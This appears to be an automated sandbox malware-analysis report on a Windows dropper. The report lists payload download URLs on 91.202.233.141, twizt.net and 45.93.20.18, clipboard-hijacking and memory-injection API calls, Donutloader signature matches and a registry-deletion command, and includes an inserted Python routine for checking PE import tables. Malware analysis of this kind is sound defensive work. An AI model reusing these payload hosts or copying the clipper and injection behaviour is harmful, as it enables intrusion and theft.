    Source: sysludpvs.exe, 00000002.00000002.3805028171.00000000021D3000.00000004.00000020.00020000.00000000.sdmp, 152942395.exe, 00000005.00000002.2127597845.00000000007B2000.00000002.00000001.01000000.00000008.sdmp, 152942395.exe, 00000005.00000000.1479470136.00000000007B2000.00000002.00000001.01000000.00000008.sdmp, 152942395.exe.2.drString found in binary or memory: http://91.202.233.141/1.exehttp://91.202.233.141/2.exehttp://91.202.233.141/3.exehttp://91.202.233.1
    Source: 152942395.exe, 00000005.00000002.2128797812.0000000001036000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/1.exei/
    Source: 152942395.exe, 152942395.exe, 00000005.00000002.2128797812.0000000001052000.00000004.00000020.00020000.00000000.sdmp, 152942395.exe, 00000005.00000002.2128797812.0000000001036000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/10.exe
    Source: 152942395.exe, 00000005.00000002.2128797812.0000000001036000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/10.exe8-
    Source: 152942395.exe, 00000005.00000002.2128797812.0000000001036000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/10.exe_-
    Source: 152942395.exe, 00000005.00000002.2128797812.0000000001052000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/10.exedb
    Source: 152942395.exe, 00000005.00000002.2128797812.0000000001036000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/10.exeg-
    Source: 152942395.exe, 00000005.00000002.2128797812.0000000001036000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/10.exey-
    Source: 152942395.exe, 00000005.00000002.2128797812.0000000001052000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/11.exe
    Source: 152942395.exe, 00000005.00000002.2128797812.0000000001052000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/11.exeR
    Source: 152942395.exe, 00000005.00000002.2128797812.0000000001052000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/11.exex
    Source: 152942395.exe, 152942395.exe, 00000005.00000002.2128797812.0000000001072000.00000004.00000020.00020000.00000000.sdmp, 152942395.exe, 00000005.00000002.2128797812.0000000001052000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/12.exe
    Source: 152942395.exe, 00000005.00000002.2128797812.0000000001052000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/12.exe6
    Source: 152942395.exe, 00000005.00000002.2128797812.0000000001052000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/12.exeL
    Source: 152942395.exe, 00000005.00000002.2128797812.0000000001052000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/12.exeR
    Source: 152942395.exe, 00000005.00000002.2128797812.0000000001052000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/12.exehn
    Source: 152942395.exe, 00000005.00000002.2128797812.0000000001052000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/12.exehqos.dll.mui
    Source: 152942395.exe, 00000005.00000002.2128797812.0000000001052000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/12.exeq
    Source: sysludpvs.exe, 00000002.00000003.1445201251.00000000005FC000.00000004.00000020.00020000.00000000.sdmp, sysludpvs.exe, 00000002.00000003.1445675085.00000000005FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/1C:
    Source: sysludpvs.exe, 00000002.00000002.3804478092.00000000005F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/2
    Source: 152942395.exe, 00000005.00000002.2128797812.0000000001064000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/2.233.141/
    Source: 152942395.exe, 00000005.00000002.2128797812.0000000001052000.00000004.00000020.00020000.00000000.sdmp, 152942395.exe, 00000005.00000002.2128797812.0000000001036000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/2.exe
    Source: 152942395.exe, 00000005.00000002.2128797812.0000000001052000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/2.exe0
    Source: sysludpvs.exe, 00000002.00000002.3804478092.00000000005F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/2a
    Source: sysludpvs.exe, 00000002.00000002.3804478092.000000000061D000.00000004.00000020.00020000.00000000.sdmp, sysludpvs.exe, 00000002.00000002.3804478092.00000000005F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/3
    Source: 152942395.exe, 152942395.exe, 00000005.00000002.2128797812.0000000001052000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/3.exe
    Source: 152942395.exe, 00000005.00000002.2128797812.0000000001036000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/3.exe9/
    Source: 152942395.exe, 00000005.00000002.2128797812.0000000001036000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/3.exeA/
    Source: sysludpvs.exe, 00000002.00000002.3804478092.00000000005F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/4
    Source: 152942395.exe, 00000005.00000002.2128797812.0000000001036000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/4.exe
    Source: 152942395.exe, 00000005.00000002.2128797812.0000000001052000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/4.exeswsock.dll.mui
    Source: sysludpvs.exe, 00000002.00000002.3804478092.00000000005F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/5
    Source: 152942395.exeString found in binary or memory: http://91.202.233.141/5.exe
    Source: 152942395.exe, 00000005.00000002.2128797812.0000000001036000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/5.exe)/
    Source: 152942395.exe, 00000005.00000002.2128797812.0000000001036000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/5.exeI/
    Source: 152942395.exe, 152942395.exe, 00000005.00000002.2128797812.0000000001036000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/6.exe
    Source: 152942395.exe, 00000005.00000002.2128797812.0000000001036000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/6.exeQ/
    Source: 152942395.exe, 00000005.00000002.2128797812.0000000001052000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/6.exeT
    Source: 152942395.exe, 152942395.exe, 00000005.00000002.2128797812.0000000001052000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/7.exe
    Source: 152942395.exe, 00000005.00000002.2128797812.0000000001052000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/7.exe233.141/3.exeshqos.dll.muid
    Source: 152942395.exe, 00000005.00000002.2128797812.0000000001036000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/7.exeq/
    Source: 152942395.exe, 00000005.00000002.2128797812.0000000001052000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/7.exeshqos.dll.mui
    Source: 152942395.exe, 00000005.00000002.2128797812.0000000001036000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/7.exey/
    Source: 152942395.exe, 00000005.00000002.2128797812.0000000001036000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/8.exe
    Source: 152942395.exe, 00000005.00000002.2128797812.0000000001036000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/8.exe1.
    Source: 152942395.exe, 152942395.exe, 00000005.00000002.2128797812.0000000001052000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/9.exe
    Source: 152942395.exe, 00000005.00000002.2128797812.0000000001052000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/9.exer
    Source: 152942395.exe, 00000005.00000002.2128797812.0000000001052000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/?k
    Source: 230053364.exe, 00000001.00000000.1355937745.0000000000410000.00000002.00000001.01000000.00000006.sdmp, 230053364.exe, 00000001.00000002.1387027346.0000000000410000.00000002.00000001.01000000.00000006.sdmp, 230053364.exe, 00000001.00000003.1376701923.00000000006B6000.00000004.00000020.00020000.00000000.sdmp, sysludpvs.exe, 00000002.00000000.1376669342.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysludpvs.exe, 00000002.00000002.3804337373.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysludpvs.exe, 00000007.00000000.1492018012.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysludpvs.exe, 00000007.00000002.1513636166.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysludpvs.exe.1.dr, 230053364.exe.0.dr, newtpp[1].exe.0.drString found in binary or memory: http://91.202.233.141/http://45.93.20.18/12345%s%s%s:Zone.Identifier%USERPROFILE%%windir%%s
    Source: 152942395.exe, 00000005.00000002.2128797812.0000000001064000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/v
    Source: 152942395.exe, 00000005.00000002.2128797812.0000000001064000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/ws
    Source: newtpp[1].exe.0.drString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
    Source: newtpp[1].exe.0.drString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
    Source: a0RkmvhSaf.exe, a0RkmvhSaf.exe, 00000000.00000002.1380429916.0000000000C5A000.00000004.00000020.00020000.00000000.sdmp, a0RkmvhSaf.exe, 00000000.00000002.1380429916.0000000000C89000.00000004.00000020.00020000.00000000.sdmp, a0RkmvhSaf.exe, 00000000.00000002.1380429916.0000000000CB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://twizt.net/newtpp.exe
    Source: a0RkmvhSaf.exeString found in binary or memory: http://twizt.net/newtpp.exeP0
    Source: a0RkmvhSaf.exeString found in binary or memory: http://twizt.net/peinstall.php
    Source: a0RkmvhSaf.exeString found in binary or memory: http://twizt.net/peinstall.php%temp%%s
    Source: a0RkmvhSaf.exe, 00000000.00000002.1380429916.0000000000C9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://twizt.net/peinstall.php6qcJ#
    Source: a0RkmvhSaf.exe, 00000000.00000002.1380429916.0000000000C9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://twizt.net/peinstall.phpIr
    Source: a0RkmvhSaf.exe, 00000000.00000002.1380429916.0000000000C9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://twizt.net/peinstall.phpXr
    Source: a0RkmvhSaf.exe, 00000000.00000002.1380429916.0000000000C9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://twizt.net/peinstall.phpq
    Source: a0RkmvhSaf.exe, 00000000.00000002.1380429916.0000000000C9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://twizt.net/peinstall.phpshqos.dll.mui
    Source: a0RkmvhSaf.exe, 00000000.00000002.1380429916.0000000000C9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://twizt.net/peinstall.phpystem32
    Source: Amcache.hve.12.drString found in binary or memory: http://upx.sf.net
    Source: C:\Users\user\AppData\Local\Temp\230053364.exeCode function: 1_2_00405A80 GetWindowLongW,SetClipboardViewer,SetWindowLongW,SetWindowLongW,SendMessageA,IsClipboardFormatAvailable,IsClipboardFormatAvailable,IsClipboardFormatAvailable,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,SendMessageA,RegisterRawInputDevices,ChangeClipboardChain,DefWindowProcA,1_2_00405A80
    Source: C:\Users\user\AppData\Local\Temp\230053364.exeCode function: 1_2_00404980 lstrlenW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,lstrlenA,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,1_2_00404980
    Source: C:\Windows\sysludpvs.exeCode function: 2_2_00404980 lstrlenW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,lstrlenA,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,2_2_00404980
    Source: C:\Windows\sysludpvs.exeCode function: 7_2_00404980 lstrlenW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,lstrlenA,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,7_2_00404980
    Source: C:\Users\user\AppData\Local\Temp\230053364.exeCode function: 1_2_00405A80 GetWindowLongW,SetClipboardViewer,SetWindowLongW,SetWindowLongW,SendMessageA,IsClipboardFormatAvailable,IsClipboardFormatAvailable,IsClipboardFormatAvailable,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,SendMessageA,RegisterRawInputDevices,ChangeClipboardChain,DefWindowProcA,1_2_00405A80
    Source: C:\Users\user\AppData\Local\Temp\230053364.exeCode function: 1_2_00405A80 GetWindowLongW,SetClipboardViewer,SetWindowLongW,SetWindowLongW,SendMessageA,IsClipboardFormatAvailable,IsClipboardFormatAvailable,IsClipboardFormatAvailable,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,SendMessageA,RegisterRawInputDevices,ChangeClipboardChain,DefWindowProcA,1_2_00405A80

    Spam, unwanted Advertisements and Ransom Demands

    Source: Yara matchFile source: Process Memory Space: 230053364.exe PID: 8652, type: MEMORYSTR
    Source: Yara matchFile source: Process Memory Space: sysludpvs.exe PID: 8672, type: MEMORYSTR
    Source: Yara matchFile source: Process Memory Space: sysludpvs.exe PID: 9076, type: MEMORYSTR

    System Summary

    Source: 00000008.00000002.1533636764.0000000000815000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
    Source: 00000008.00000002.1533636764.0000000000815000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_5c38878d Author: unknown
    Source: 00000009.00000002.1614530538.00000218E1C80000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
    Source: 00000009.00000002.1614530538.00000218E1C80000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_5c38878d Author: unknown
    Source: C:\Windows\sysludpvs.exeProcess Stats: CPU usage > 49%
    Source: C:\Users\user\AppData\Local\Temp\230053364.exeCode function: 1_2_0040D610 NtQuerySystemTime,RtlTimeToSecondsSince1980,1_2_0040D610
    Source: C:\Users\user\AppData\Local\Temp\230053364.exeCode function: 1_2_0040F235 NtQueryVirtualMemory,1_2_0040F235
    Source: C:\Windows\sysludpvs.exeCode function: 2_2_0040D610 NtQuerySystemTime,RtlTimeToSecondsSince1980,2_2_0040D610
    Source: C:\Windows\sysludpvs.exeCode function: 2_2_0040F235 NtQueryVirtualMemory,2_2_0040F235
    Source: C:\Windows\sysludpvs.exeCode function: 7_2_0040D610 NtQuerySystemTime,RtlTimeToSecondsSince1980,7_2_0040D610
    Source: C:\Windows\sysludpvs.exeCode function: 7_2_0040F235 NtQueryVirtualMemory,7_2_0040F235
    Source: C:\Users\user\AppData\Local\Temp\634722489.exeCode function: 8_2_00401D58 NtAllocateVirtualMemory,8_2_00401D58
    Source: C:\Users\user\AppData\Local\Temp\634722489.exeCode function: 8_2_00401D18 NtWriteVirtualMemory,8_2_00401D18
    Source: C:\Users\user\AppData\Local\Temp\634722489.exeCode function: 8_2_004019D8 NtCreateThreadEx,8_2_004019D8
    Source: C:\Users\user\AppData\Local\Temp\634722489.exeCode function: 8_2_00401D98 NtProtectVirtualMemory,8_2_00401D98
    Source: C:\Users\user\AppData\Local\Temp\634722489.exeCode function: 8_2_00401C98 NtClose,8_2_00401C98
    Source: C:\Users\user\AppData\Local\Temp\2052810334.exeCode function: 13_2_00007FF7C6B00FD9 NtQuerySystemInformation,13_2_00007FF7C6B00FD9
    Source: C:\Users\user\AppData\Local\Temp\417928448.exeCode function: 18_2_00007FF7C6B20FD9 NtQuerySystemInformation,18_2_00007FF7C6B20FD9
    Source: C:\Users\user\AppData\Local\Temp\2047112978.exeCode function: 23_2_00007FF7C6AE0FD9 NtQuerySystemInformation,23_2_00007FF7C6AE0FD9
    Source: C:\Users\user\AppData\Local\Temp\399630275.exeCode function: 28_2_00007FF7C6AF0FD9 NtQuerySystemInformation,28_2_00007FF7C6AF0FD9
    Source: C:\Users\user\AppData\Local\Temp\2028814805.exeCode function: 33_2_00007FF7C6AF0F39 NtQuerySystemInformation,33_2_00007FF7C6AF0F39
    Source: C:\Users\user\AppData\Local\Temp\393932919.exeCode function: 40_2_00007FF7C6B006BA NtQuerySystemInformation,40_2_00007FF7C6B006BA
    Source: C:\Users\user\AppData\Local\Temp\393932919.exeCode function: 40_2_00007FF7C6B00FD9 NtQuerySystemInformation,40_2_00007FF7C6B00FD9
    Source: C:\Users\user\AppData\Local\Temp\1216017805.exeCode function: 45_2_00007FF7C6B20F11 NtQuerySystemInformation,45_2_00007FF7C6B20F11
    Source: C:\Users\user\AppData\Local\Temp\38822795.exeCode function: 54_2_00007FF7C6B106BA NtQuerySystemInformation,54_2_00007FF7C6B106BA
    Source: C:\Users\user\AppData\Local\Temp\38822795.exeCode function: 54_2_00007FF7C6B10FD9 NtQuerySystemInformation,54_2_00007FF7C6B10FD9
    Source: C:\Users\user\AppData\Local\Temp\230053364.exeFile created: C:\Windows\sysludpvs.exeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\230053364.exeCode function: 1_2_0040A6701_2_0040A670
    Source: C:\Users\user\AppData\Local\Temp\230053364.exeCode function: 1_2_004040901_2_00404090
    Source: C:\Users\user\AppData\Local\Temp\230053364.exeCode function: 1_2_00407C901_2_00407C90
    Source: C:\Users\user\AppData\Local\Temp\230053364.exeCode function: 1_2_00407CB91_2_00407CB9
    Source: C:\Users\user\AppData\Local\Temp\230053364.exeCode function: 1_2_0040EFF81_2_0040EFF8
    Source: C:\Users\user\AppData\Local\Temp\230053364.exeCode function: 1_2_004049801_2_00404980
    Source: C:\Windows\sysludpvs.exeCode function: 2_2_0040A6702_2_0040A670
    Source: C:\Windows\sysludpvs.exeCode function: 2_2_004040902_2_00404090
    Source: C:\Windows\sysludpvs.exeCode function: 2_2_00407C902_2_00407C90
    Source: C:\Windows\sysludpvs.exeCode function: 2_2_00407CB92_2_00407CB9
    Source: C:\Windows\sysludpvs.exeCode function: 2_2_0040EFF82_2_0040EFF8
    Source: C:\Windows\sysludpvs.exeCode function: 2_2_004049802_2_00404980
    Source: C:\Windows\sysludpvs.exeCode function: 7_2_0040A6707_2_0040A670
    Source: C:\Windows\sysludpvs.exeCode function: 7_2_004040907_2_00404090
    Source: C:\Windows\sysludpvs.exeCode function: 7_2_00407C907_2_00407C90
    Source: C:\Windows\sysludpvs.exeCode function: 7_2_00407CB97_2_00407CB9
    Source: C:\Windows\sysludpvs.exeCode function: 7_2_0040EFF87_2_0040EFF8
    Source: C:\Windows\sysludpvs.exeCode function: 7_2_004049807_2_00404980
    Source: C:\Windows\System32\conhost.exeCode function: 9_2_00000218E1C843069_2_00000218E1C84306
    Source: C:\Windows\System32\conhost.exeCode function: 9_2_00000218E1C846D69_2_00000218E1C846D6
    Source: C:\Windows\System32\conhost.exeCode function: 9_2_00000218E1C84F6A9_2_00000218E1C84F6A
    Source: C:\Windows\System32\conhost.exeCode function: 9_2_00000218E1C836D29_2_00000218E1C836D2
    Source: C:\Windows\System32\conhost.exeCode function: 9_2_00000218E1C84B0E9_2_00000218E1C84B0E
    Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 9208 -s 944
    Source: 2047112978.exe.5.dr  Static PE information: No import functions for PE file found
    Source: 2052810334.exe.5.dr  Static PE information: No import functions for PE file found
    Source: 396820397.exe.5.dr  Static PE information: No import functions for PE file found
    Source: 393932919.exe.5.dr  Static PE information: No import functions for PE file found
    Source: 5[1].exe.5.dr  Static PE information: No import functions for PE file found
    Source: 4[1].exe.5.dr  Static PE information: No import functions for PE file found
    Source: 11[1].exe.5.dr  Static PE information: No import functions for PE file found
    Source: 3[1].exe.5.dr  Static PE information: No import functions for PE file found
    Source: 6[1].exe.5.dr  Static PE information: No import functions for PE file found
    Source: 2[1].exe.5.dr  Static PE information: No import functions for PE file found
    Source: 7[1].exe.5.dr  Static PE information: No import functions for PE file found
    Source: 2028814805.exe.5.dr  Static PE information: No import functions for PE file found
    Source: 417928448.exe.5.dr  Static PE information: No import functions for PE file found
    Source: 10[1].exe.5.dr  Static PE information: No import functions for PE file found
    Source: 8[1].exe.5.dr  Static PE information: No import functions for PE file found
    Source: 399630275.exe.5.dr  Static PE information: No import functions for PE file found
    Source: 203235335.exe.5.dr  Static PE information: No import functions for PE file found
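Seventeen dropped files are flagged above with "No import functions for PE file found", the static fingerprint of a payload that carries no import table and resolves its APIs at run time (packed or shellcode-wrapped binaries look like this). The Python below is an added example, not Joe Sandbox code and not derived from the dropped files: it reads the import data directory straight out of the PE optional header, handling both PE32 and PE32+, so the verdict can be reproduced without loading the file. The two images it checks are header-only blobs constructed inline as sample input; they are not executables.

```python
"""Reproduce a 'no import functions' triage verdict from the PE header.
Added example for this report; not Joe Sandbox code. The sample images are
constructed headers (DOS stub + COFF + optional header, no sections)."""
import struct


def import_directory(data):
    """Return (rva, size) of IMAGE_DIRECTORY_ENTRY_IMPORT (index 1 of the
    data directory). Raises ValueError for anything that is not PE32/PE32+."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    size_opt = struct.unpack_from("<H", data, e_lfanew + 20)[0]
    opt = e_lfanew + 24                        # optional header starts after COFF header
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic == 0x10B:                         # PE32: 32-bit image
        nrva_off, dirs_off = opt + 92, opt + 96
    elif magic == 0x20B:                       # PE32+: 64-bit image
        nrva_off, dirs_off = opt + 108, opt + 112
    else:
        raise ValueError("unknown optional header magic 0x%x" % magic)
    if nrva_off + 4 > opt + size_opt:
        raise ValueError("optional header too short for a data directory")
    nrva = struct.unpack_from("<I", data, nrva_off)[0]
    if nrva < 2:                               # no room for the import entry
        return (0, 0)
    return struct.unpack_from("<II", data, dirs_off + 8)


def has_imports(data):
    """True when the import directory points somewhere. A zero entry is the
    usual reason a sandbox reports no import functions at all."""
    rva, size = import_directory(data)
    return rva != 0 and size != 0


def build_pe32_header(import_rva, import_size):
    """Constructed minimal PE32 header used only as sample input."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)    # e_lfanew -> PE signature
    # Machine=i386, 0 sections, timestamps/symbols zero, 224-byte optional
    # header, Characteristics = EXECUTABLE_IMAGE | 32BIT_MACHINE
    coff = struct.pack("<HHIIIHH", 0x14C, 0, 0, 0, 0, 224, 0x0102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)      # PE32 magic
    struct.pack_into("<I", opt, 92, 16)        # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 96 + 8, import_rva, import_size)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)


if __name__ == "__main__":
    for label, blob in (("empty import directory", build_pe32_header(0, 0)),
                        ("import directory present", build_pe32_header(0x2000, 0x28))):
        print(label, import_directory(blob), has_imports(blob))
```

On a real dropped file call `has_imports(open(path, "rb").read())`. A zero directory entry is the common case behind this verdict; an image can also carry a non-empty directory whose descriptors list no thunks, and checking that needs the section table to map the RVA to a file offset, so beyond a first triage pass use pefile's `DIRECTORY_ENTRY_IMPORT` walk.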
    Source: a0RkmvhSaf.exe  Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\Windows Services" /f
    Source: 00000008.00000002.1533636764.0000000000815000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY  Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
    Source: 00000008.00000002.1533636764.0000000000815000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY  Matched rule: Windows_Trojan_Donutloader_5c38878d os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 3b55ec6c37891880b53633b936d10f94d2b806db1723875e4ac95f8a34d97150, id = 5c38878d-ca94-4fd9-a36e-1ae5fe713ca2, last_modified = 2021-01-13
    Source: 00000009.00000002.1614530538.00000218E1C80000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY  Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
    Source: 00000009.00000002.1614530538.00000218E1C80000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY  Matched rule: Windows_Trojan_Donutloader_5c38878d os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 3b55ec6c37891880b53633b936d10f94d2b806db1723875e4ac95f8a34d97150, id = 5c38878d-ca94-4fd9-a36e-1ae5fe713ca2, last_modified = 2021-01-13
    Source: 2028814805.exe, 00000021.00000002.1820333386.0000000000BD8000.00000004.00000020.00020000.00000000.sdmp  Binary or memory string: ;.VBP
    Source: classification engine  Classification label: mal100.troj.evad.winEXE@102/45@2/82
    Source: C:\Users\user\AppData\Local\Temp\230053364.exe  Code function: 1_2_00406D30 Sleep,GetModuleFileNameW,GetVolumeInformationW,GetDiskFreeSpaceExW,_aulldiv,wsprintfW,wsprintfW,wsprintfW,Sleep,ExitThread
    Source: C:\Users\user\AppData\Local\Temp\230053364.exe  Code function: 1_2_0040DC20 SysAllocString,CoCreateInstance,SysFreeString
    Source: C:\Users\user\Desktop\a0RkmvhSaf.exe  File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\newtpp[1].exe
    Source: C:\Windows\System32\conhost.exe  Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8628:120:WilError_03
    Source: C:\Windows\System32\conhost.exe  Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1600:120:WilError_03
    Source: C:\Windows\sysludpvs.exe  Mutant created: \Sessions\1\BaseNamedObjects\k993947s89
    Source: C:\Users\user\AppData\Local\Temp\396820397.exe  Mutant created: NULL
    Source: C:\Windows\System32\conhost.exe  Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2828:120:WilError_03
    Source: C:\Windows\System32\conhost.exe  Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5444:120:WilError_03
    Source: C:\Windows\System32\conhost.exe  Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2484:120:WilError_03
    Source: C:\Windows\System32\conhost.exe  Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3348:120:WilError_03
    Source: C:\Windows\System32\conhost.exe  Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9172:120:WilError_03
    Source: C:\Windows\System32\conhost.exe  Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3868:120:WilError_03
    Source: C:\Windows\System32\conhost.exe  Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8464:120:WilError_03
    Source: C:\Windows\System32\conhost.exe  Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6140:120:WilError_03
    Source: C:\Windows\System32\conhost.exe  Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6824:120:WilError_03
    Source: C:\Windows\System32\WerFault.exe  Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess9208
    Source: C:\Users\user\Desktop\a0RkmvhSaf.exe  File created: C:\Users\user\AppData\Local\Temp\230053364.exe
    Source: a0RkmvhSaf.exe  Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\AppData\Local\Temp\2028814805.exe  System information queried: HandleInformation
    Source: C:\Users\user\AppData\Local\Temp\2052810334.exe  File read: C:\Users\user\Desktop\desktop.ini
    Source: C:\Users\user\Desktop\a0RkmvhSaf.exe  Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
